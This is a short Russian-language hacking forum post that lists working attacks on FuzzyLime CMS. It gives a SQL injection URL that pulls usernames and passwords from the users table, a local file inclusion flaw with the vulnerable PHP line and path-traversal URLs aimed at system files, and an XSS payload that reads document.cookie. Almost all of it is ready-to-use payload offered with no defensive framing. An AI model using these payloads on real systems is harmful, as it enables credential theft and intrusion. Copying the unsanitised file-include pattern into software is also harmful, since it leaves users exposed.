08.01.2009, 02:23
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
С нами:
10061666
Репутация:
2438
|
|
FuzzyLime CMS
FuzzyLime CMS
SQL Иньекция:
Код:
http://site/shop_showcat.php?='%20UNION%20ALL%20SELECT%201,2,3,4,5,6,concat(username,':',passwrd)%20from%20users/*
Локальный Инклуд:
Файл:index.php :
Уязвимый кусок кода:
Код:
<?php readfile($Root.$Path); ?> <---[xxx]
<form action="application_loader.php" method="post">
Код:
http://site/index.php?Root=../../../../../../etc/password
Код:
http://index.php?Path=../../../../../../etc/password
XSS:
Код:
http://site/login.php?url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Последний раз редактировалось baltazar; 08.01.2009 в 20:24..
|
|
|